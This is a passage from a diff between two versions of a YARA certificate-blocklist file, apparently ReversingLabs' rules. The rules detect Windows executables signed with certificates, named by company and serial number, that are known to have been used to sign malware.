"ca812cdfbb7ca984fae1e16159eb0eeb1e65767fcc6aa07eeb84966853146f9d" score = 75 quality = 90 tags = "INFO, FILE" @@ -15312,22 +35103,22 @@ rule REVERSINGLABS_Cert_Blocklist_28B691272719B1Ee : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "2021945 Ontario Inc." and pe.signatures[i].serial=="28:b6:91:27:27:19:b1:ee" and 1616410532<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Maxiol" and pe.signatures[i].serial=="32:11:99:25:a6:ce:47:10:ae:cc:40:06:c2:8e:74:9f" and 1592438400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1C897216E58E83Cbe74Ad03284E1Fb82 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2C90Eaf4De3Afc03Ba924C719435C2A3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8805805d-312d-5bd4-94da-c18270ac26bf" + id = "06edc1a3-65b1-5a69-ab6b-4ffc3963513c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10862-L10878" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6b3b2708d3a442fa6425e60ae900c94fc22fbfdb47f290ff56e9d349d99fd85f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4870-L4888" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5bb78a5e39f9d023cf63edabdc83d4965fc79f6f04f9fea9bcf2a53223fbd4ca" score = 75 quality = 90 tags = "INFO, FILE" @@ -15337,22 +35128,22 @@ rule REVERSINGLABS_Cert_Blocklist_1C897216E58E83Cbe74Ad03284E1Fb82 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "M-Trans Maciej Caban" and pe.signatures[i].serial=="1c:89:72:16:e5:8e:83:cb:e7:4a:d0:32:84:e1:fb:82" and 1639119705<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AntiFIX s.r.o." and (pe.signatures[i].serial=="00:2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" or pe.signatures[i].serial=="2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3") and 1586293430<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5A364C4957D93406F76321C2316F42F0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Aff762E907F0644E76Ed8A7485Fb12A1 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "49e36ae5-25f0-5e1d-82f0-c7ada2b4d914" + id = "3b3bbbdd-9c2d-5c80-a121-3e3ad13e9ac6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10880-L10896" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fe3a2b906debb3f03e6a403829fca02c751754e9a02442a962c66defb84aed83" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4890-L4908" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ad05389e0eb30cb894b03842d213b8c956f66357a913c73d8d8b79f8336bf980" score = 75 quality = 90 tags = "INFO, FILE" @@ -15362,22 +35153,22 @@ rule REVERSINGLABS_Cert_Blocklist_5A364C4957D93406F76321C2316F42F0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Board Game Bucket Ltd" and pe.signatures[i].serial=="5a:36:4c:49:57:d9:34:06:f7:63:21:c2:31:6f:42:f0" and 1661337307<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lets Start SP Z O O" and (pe.signatures[i].serial=="00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" or pe.signatures[i].serial=="af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1") and 1594882330<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E7E7F7180666546Ce7A8Da32119F5Ce1 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D8530214Ca0F512946496B5164C61201 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8984ac03-2646-54a1-a6d3-4c2cc72806e7" + id = "0125a67a-d5e7-5c93-a58c-cacb6d8fa60b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10898-L10916" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "940f6508208998593f309ffeeeda20ab475d427c952a14871b6e58e17d2a4c85" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4910-L4928" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "377962915586c9f5a5737c24b698c96efc2e819e52ee16109c405f9af2d57e7f" score = 75 quality = 90 tags = "INFO, FILE" @@ -15387,22 +35178,22 @@ rule REVERSINGLABS_Cert_Blocklist_E7E7F7180666546Ce7A8Da32119F5Ce1 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "C\\xC3\\x94NG TY TNHH PDF SOFTWARE" and (pe.signatures[i].serial=="00:e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" or pe.signatures[i].serial=="e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1") and 1661558399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DJ ONLINE MARKETING LIMITED" and (pe.signatures[i].serial=="00:d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" or pe.signatures[i].serial=="d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01") and 1595485920<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_062B2827500C5Df35A83F661B3Af5Dd3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_661Ba8F3C9D1B348413484E9A49502F7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "784c58d9-9a13-5402-867e-c1b144512957" + id = "a0c501c9-a856-55b6-b845-aeab4db5ab51" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10918-L10934" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4edc263b08b21428b5f2f4f14f9582c0f96f79cb49fbba563c103bf8bb2037a6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4930-L4948" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4840b311c1e2c0ae14bb2cf6fa8d96ab1a434ceac861db540697f3aed1a6833f" score = 75 quality = 90 tags = "INFO, FILE" @@ -15412,22 +35203,22 @@ rule REVERSINGLABS_Cert_Blocklist_062B2827500C5Df35A83F661B3Af5Dd3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "*.eos.com" and pe.signatures[i].serial=="06:2b:28:27:50:0c:5d:f3:5a:83:f6:61:b3:af:5d:d3" and 1651449600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Unique Digital Services Ltd." and (pe.signatures[i].serial=="00:66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" or pe.signatures[i].serial=="66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7") and 1594942800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Bf27695Fd20B588F2B2F173B6Caf2Ba : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_51Aead5A9Ab2D841B449Fa82De3A8A00 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a3e6923a-f2c4-5d7c-aeab-bdb7fe03c597" + id = "c4909945-f2f1-53b2-b438-edf411fda7ed" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10936-L10952" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "94d8739761b6a8ee91550be47432b046609b076aab6e57996de123a0fcaba73e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4950-L4966" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e53095aab9d6c2745125e8cd933334ebc2e51a9725714d31a46baa74b8e42ed9" score = 75 quality = 90 tags = "INFO, FILE" @@ -15437,22 +35228,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Bf27695Fd20B588F2B2F173B6Caf2Ba : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Game Warriors Limited" and pe.signatures[i].serial=="7b:f2:76:95:fd:20:b5:88:f2:b2:f1:73:b6:ca:f2:ba" and 1662112800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Corsair Software Solution Inc." and pe.signatures[i].serial=="51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" and 1501577475<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1B248C8508042D36Bbd5D92D189C61D8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_03B630F9645531F8868Dae8Ac0F8Cfe6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4ad05207-10d1-53c5-8383-a3c71a447ed6" + id = "be945687-9b8c-5d84-9992-fd317eddae54" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10954-L10970" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2c063d0878a8bf6cd637e1dac2cb9164beb52c951e01858a7c3c9c4c1a853f54" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4968-L4984" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6d2f4346760bf52a438c4c996e92a2641bebfd536248776383d7c8394e094e6a" score = 75 quality = 90 tags = "INFO, FILE" @@ -15462,22 +35253,22 @@ rule REVERSINGLABS_Cert_Blocklist_1B248C8508042D36Bbd5D92D189C61D8 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digital Robin Limited" and pe.signatures[i].serial=="1b:24:8c:85:08:04:2d:36:bb:d5:d9:2d:18:9c:61:d8" and 1663171218<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Geksan LLC" and pe.signatures[i].serial=="03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" and 1594252801<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_032660Ee1D49Ad35086027473E2614E5E724 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6F8373Cf89F1B49138F4328118487F9E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "29cb9255-0a34-58e8-88b2-fad988c7d229" + id = "80c5d205-7f5e-5e06-b490-f33205154974" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10972-L10988" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8d1435d2fa70db12cde2f9098e35ca1737f5aac36bac91329b28f03aad090e90" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4986-L5002" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f926c2f73d47d463721a0cad48d9866192df55d71867941a40cba7e0b7725102" score = 75 quality = 90 tags = "INFO, FILE" @@ -15487,22 +35278,22 @@ rule REVERSINGLABS_Cert_Blocklist_032660Ee1D49Ad35086027473E2614E5E724 : INFO FI importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "sunshine.com" and pe.signatures[i].serial=="03:26:60:ee:1d:49:ad:35:08:60:27:47:3e:26:14:e5:e7:24" and 1660238245<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "30 PTY LTD" and pe.signatures[i].serial=="6f:83:73:cf:89:f1:b4:91:38:f4:32:81:18:48:7f:9e" and 1572566400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_043052956E1E6Dbd5F6Ae3D8B82Cad2A2Ed8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E38259Cf24Cc702Ce441B683Ad578911 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ac09f8ac-fbdd-5989-a7e7-07373a69213b" + id = "fc5df86f-b8c9-58b1-bd41-e03ed50829dd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10990-L11006" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c29fb109c741437a3739f1c42aadace8f612ef1e3ea90e3e2bdd8a92c85e766a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5004-L5022" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2428df14a18f4aed1a3db85c1fb43a847fae8a922c6dc948f3bc514dc4cae09c" score = 75 quality = 90 tags = "INFO, FILE" @@ -15512,22 +35303,22 @@ rule REVERSINGLABS_Cert_Blocklist_043052956E1E6Dbd5F6Ae3D8B82Cad2A2Ed8 : INFO FI importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ok.com" and pe.signatures[i].serial=="04:30:52:95:6e:1e:6d:bd:5f:6a:e3:d8:b8:2c:ad:2a:2e:d8" and 1662149613<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Akhirah Technologies Inc." and (pe.signatures[i].serial=="00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" or pe.signatures[i].serial=="e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11") and 1597276800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Dbc03Ca7E6Ae6Db6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a5ac5da6-0bb0-5327-ac3a-b53d2f103fe6" + id = "66feefd2-9cec-56fc-a1c1-11004363462d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11008-L11026" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0077b9c46ddd98a4929878ba4ba9476ed7fb1d7bf6e30c3ae0f950445d01e8f3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5024-L5042" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4fc3e57bedb6fb7c96e6a1ee2ad2aec3860716ac714d52ea58b86be4bbda4660" score = 75 quality = 90 tags = "INFO, FILE" @@ -15537,22 +35328,22 @@ rule REVERSINGLABS_Cert_Blocklist_Dbc03Ca7E6Ae6Db6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SPIDER DEVELOPMENTS PTY LTD" and (pe.signatures[i].serial=="00:db:c0:3c:a7:e6:ae:6d:b6" or pe.signatures[i].serial=="db:c0:3c:a7:e6:ae:6d:b6") and 1600826873<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALM4U GmbH" and (pe.signatures[i].serial=="00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" or pe.signatures[i].serial=="bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a") and 1579824000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7D27332C3Cb3A382A4Fd232C5C66A2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B2E730B0526F36Faf7D093D48D6D9997 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d8390528-ff27-514d-ab89-fd563a19ce3c" + id = "eb82e05b-9aee-5ea7-88a5-8d186b8aafb8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11028-L11044" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c1c50015db7f97b530819b40e2578463a6021bfff8e2582858a4c3fbd1a9b9bc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5044-L5062" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f74cc94428d7739abf6ee76f6cbd53aa47cea815a014de0d786fe53b15f66201" score = 75 quality = 90 tags = "INFO, FILE" @@ -15562,22 +35353,22 @@ rule REVERSINGLABS_Cert_Blocklist_7D27332C3Cb3A382A4Fd232C5C66A2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures[i].serial=="7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" and 1655424000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bamboo Connect s.r.o." and (pe.signatures[i].serial=="00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" or pe.signatures[i].serial=="b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97") and 1597276800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_82D224323Efa65060B641F51Fadfef02 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "166949cf-dbff-5713-950e-46d1f3edc61f" + id = "b285a407-7f71-5c7e-baae-bfa111a50101" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11046-L11064" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9d361c91ed24b6c20a7b35957e26f208ce8e0a3d79c5a6fed6278acd826ccf49" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5064-L5080" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7bb093287dd309ce12859eca9a9fc98095b3d52ec860626fe6e743bace262fde" score = 75 quality = 90 tags = "INFO, FILE" @@ -15587,22 +35378,22 @@ rule REVERSINGLABS_Cert_Blocklist_82D224323Efa65060B641F51Fadfef02 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAVAS INVESTMENTS PTY LTD" and (pe.signatures[i].serial=="00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures[i].serial=="82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02") and 1665100800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BOREC, OOO" and pe.signatures[i].serial=="71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" and 1597363200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_890570B6B0E2868A53Be3F8F904A88Ee : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_13794371C052Ec0559E9B492Abb25C26 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "681d233c-d5a2-5f25-bdb9-125149a291c4" + id = "31f119a3-e0da-5875-826f-68c40c6f8b88" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11066-L11084" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fb7af8ec09da2fecaaaed8c7770966f11ef8a44a131553a9d1412387db2fb7ea" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5082-L5098" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7383d1fb1fa6e49f8fa9e1eecfe3fcedb8a11702fbd3700630a11b12da29fedf" score = 75 quality = 90 tags = "INFO, FILE" @@ -15612,22 +35403,22 @@ rule REVERSINGLABS_Cert_Blocklist_890570B6B0E2868A53Be3F8F904A88Ee : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JESEN LESS d.o.o." and (pe.signatures[i].serial=="00:89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" or pe.signatures[i].serial=="89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee") and 1636588800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Carmel group LLC" and pe.signatures[i].serial=="13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" and 1599177600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2642Fe865F7566Ce3123A5142C207094 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "508d9c00-c209-55b2-9a40-b62ff4d866c9" + id = "5906107a-03ce-5ca4-b0a7-12b0b45359dd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11086-L11102" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1ad4adf8b05a6cc065d289e6963480d37a92712a318744a30a16aad22380f238" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5100-L5116" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7521abc5c93f0336af4fab95268962aa3d3fb48fed6a8ba7fdb98e373158b327" score = 75 quality = 90 tags = "INFO, FILE" @@ -15637,22 +35428,22 @@ rule REVERSINGLABS_Cert_Blocklist_2642Fe865F7566Ce3123A5142C207094 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "C.W.D. INSTAL LTD" and pe.signatures[i].serial=="26:42:fe:86:5f:75:66:ce:31:23:a5:14:2c:20:70:94" and 1666310400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Cubic Information Systems, UAB" and pe.signatures[i].serial=="5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" and 1579824000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4A2E337Fff23E5B2A1321Ffde56D1759 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Dadf44E4046372313Ee97B8E394C4079 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e5cae614-eff1-5c3d-a7f6-c41b0a2c412e" + id = "bebfbbd7-8d42-50a3-8efa-85b641eb069a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11104-L11120" - license_url = 